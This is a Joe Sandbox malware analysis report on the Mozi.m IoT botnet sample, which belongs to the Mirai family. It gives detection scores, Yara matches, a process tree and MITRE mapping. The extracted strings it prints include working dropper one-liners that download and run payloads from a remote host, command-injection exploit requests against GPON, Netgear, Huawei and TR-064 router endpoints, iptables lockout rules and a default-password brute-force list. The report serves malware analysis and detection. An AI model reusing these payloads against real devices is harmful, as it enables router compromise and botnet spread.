Play interactive tour

Edit tour

Linux Analysis Report Mozi.m

Overview

General Information

Sample Name:	Mozi.m
Analysis ID:	450743
MD5:	e957309c9cb381574c622b2d2a6798c0
SHA1:	3589d0f624deb034ad2ac15cb1f1f0f0fde10908
SHA256:	54dfe49f5b114030c318eb1be2d86bdcfac3e10d730b08631028f992fc92c9d0
Infos:

Detection

Mirai

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Found strings indicative of a multi-platform dropper

Sample is packed with UPX

Sample contains only a LOAD segment without any section mappings

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample contains strings that are potentially command strings

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

Analysis Advice

Non-zero exit code suggests an error during the execution. Lookup the error code for hints.

Static ELF header machine description suggests that the sample might not execute correctly on this machine

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	450743
Start date:	19.07.2021
Start time:	17:05:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Mozi.m
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Detection:	MAL
Classification:	mal96.spre.troj.evad.linM@0/2@0/0
Warnings:	Show All VT rate limit hit for: http://%s:%d/bin.sh;chmod

Process Tree

system is lnxubuntu1

Mozi.m (PID: 4568, Parent: 4498, MD5: e957309c9cb381574c622b2d2a6798c0) Arguments: /usr/bin/qemu-mips /tmp/Mozi.m

upstart New Fork (PID: 4587, Parent: 3310)

sh (PID: 4587, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4588, Parent: 4587)

date (PID: 4588, Parent: 4587, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4589, Parent: 4587)

apport-checkreports (PID: 4589, Parent: 4587, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system

upstart New Fork (PID: 4614, Parent: 3310)

sh (PID: 4614, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4615, Parent: 4614)

date (PID: 4615, Parent: 4614, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4632, Parent: 4614)

apport-gtk (PID: 4632, Parent: 4614, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

upstart New Fork (PID: 4641, Parent: 3310)

sh (PID: 4641, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4643, Parent: 4641)

date (PID: 4643, Parent: 4641, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4659, Parent: 4641)

apport-gtk (PID: 4659, Parent: 4641, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Mozi.m	SUSP_ELF_LNX_UPX_Compressed_File	Detects a suspicious ELF binary with UPX compression	Florian Roth	0x1fce8:$s1: PROT_EXEC\|PROT_WRITE failed. 0x1fd57:$s2: $Id: UPX 0x1fd08:$s3: $Info: This file is packed with the UPX executable packer
Mozi.m	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.m	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Mozi.m	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Mozi.m	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Mozi.m	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Click to see the 1 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Mozi.m

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: Mozi.m	Virustotal: Detection: 60%	Perma Link
Source: Mozi.m	Metadefender: Detection: 40%	Perma Link
Source: Mozi.m	ReversingLabs: Detection: 66%

Spreading:

Found strings indicative of a multi-platform dropper

Show sources

Source: Mozi.m	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.m	String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: Mozi.m	String found in binary or memory: http://127.0.0.1
Source: Mozi.m	String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m	String found in binary or memory: http://HTTP/1.1
Source: Mozi.m	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: Mozi.m	String found in binary or memory: http://ipinfo.io/ip
Source: Mozi.m	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: Mozi.m	String found in binary or memory: http://upx.sf.net

Source: LOAD without section mappings

Program segment: 0x400000

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls \|\| /bin/busybox cat /bin/ls \|\| while read i; do printf $i; done < /bin/ls \|\| while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Source: Initial sample	Potential command found: mv -f
Source: Initial sample	Potential command found: POST /cdn-cgi/
Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample	Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample	Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample	Potential command found: mount -o remount,rw /overlay /
Source: Initial sample	Potential command found: mv -f %s %s
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: killall -9 %s
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample	Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample	Potential command found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Source: Mozi.m, type: SAMPLE	Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: Mozi.m, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: classification engine

Classification label: mal96.spre.troj.evad.linM@0/2@0/0

Data Obfuscation:

Sample is packed with UPX

Show sources

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Source: /tmp/Mozi.m (PID: 4568)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4632)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4659)	Queries kernel information via 'uname':	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Path Interception	Path Interception	Scripting1	Brute Force1	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Mozi.m	60%	Virustotal		Browse
Mozi.m	43%	Metadefender		Browse
Mozi.m	67%	ReversingLabs	Linux.Trojan.Mirai
Mozi.m	100%	Avira	LINUX/Mirai.cuqzt

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://%s:%d/bin.sh;chmod	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.a;chmod	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;/tmp/Mozi.m	0%	Avira URL Cloud	safe
http://%s:%d/bin.sh	0%	Avira URL Cloud	safe
http://purenetworks.com/HNAP1/	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;$	0%	Avira URL Cloud	safe
http://HTTP/1.1	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.a;sh$	0%	Avira URL Cloud	safe
http://127.0.0.1	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m	0%	Avira URL Cloud	safe
http://127.0.0.1sendcmd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://%s:%d/bin.sh;chmod	Mozi.m	true	Avira URL Cloud: safe	low
http://ipinfo.io/ip	Mozi.m	false		high
http://%s:%d/Mozi.a;chmod	Mozi.m	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.m;/tmp/Mozi.m	Mozi.m	true	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/encoding/	Mozi.m	false		high
http://%s:%d/bin.sh	Mozi.m	true	Avira URL Cloud: safe	low
http://purenetworks.com/HNAP1/	Mozi.m	false	Avira URL Cloud: safe	unknown
http://%s:%d/Mozi.m;	Mozi.m	true	Avira URL Cloud: safe	low
http://%s:%d/Mozi.m;$	Mozi.m	true	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/envelope/	Mozi.m	false		high
http://upx.sf.net	Mozi.m	false		high
http://HTTP/1.1	Mozi.m	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.a;sh$	Mozi.m	false	Avira URL Cloud: safe	low
http://127.0.0.1	Mozi.m	false	Avira URL Cloud: safe	unknown
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)	Mozi.m	false		high
http://schemas.xmlsoap.org/soap/envelope//	Mozi.m	false		high
http://%s:%d/Mozi.m	Mozi.m	true	Avira URL Cloud: safe	low
http://127.0.0.1sendcmd	Mozi.m	false	Avira URL Cloud: safe	low

Contacted IPs

No contacted IP infos

Runtime Messages

Command:	/tmp/Mozi.m
Exit Code:	133
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/var/crash/_usr_share_apport_apport-checkreports.1000.crash Download File
Process:	/usr/share/apport/apport-checkreports
File Type:	ASCII text
Category:	dropped
Size (bytes):	14915
Entropy (8bit):	4.685592697936091
Encrypted:	false
SSDEEP:	192:gIfh25JHJ5NNhfK54aqaG0KRE4rIPIehbM:ZfMXpO5GRERo
MD5:	369014BA6E21E3A99CA5E15A3066F52A
SHA1:	58C2811B8BE49B52A3C9ABA50C23BED1F88A0F07
SHA-256:	740C55D8B9FC3B7BB62D57D162072B9902458970825D98022666CC445CD83774
SHA-512:	30035359A00BAD2127309D37FEED744D2470C8A820A530ED0DDBE5D7ABDEBA4E38B1F5E97D8F29F25D00956CD858E73B6A307D8FB1493258E5628C85952DCDA1
Malicious:	false
Reputation:	low
Preview:	ProblemType: Crash.Date: Mon Jul 19 19:06:24 2021.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01cc4000-0201c000 rw-p 00000000 00:00 0 [heap]. 7fdacf0b5000-7fdacf236000 rw-p 00000000 00:00 0 . 7fdacf236000-7fdacf24d000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7fdacf24d000-7fdacf44c000 ---p 00017000 fc:0

/var/crash/_usr_share_apport_apport-gtk.1000.crash Download File
Process:	/usr/share/apport/apport-gtk
File Type:	ASCII text
Category:	dropped
Size (bytes):	47094
Entropy (8bit):	4.507687905583427
Encrypted:	false
SSDEEP:	768:L/X/+/L/Q+z6FlyxNe9Hb8fqCXdrBQKTVv:L/X/+/L/oyxNe9Hb8iCXdrBQKTVv
MD5:	BFBAC00590A85D4243E5742288EBA36F
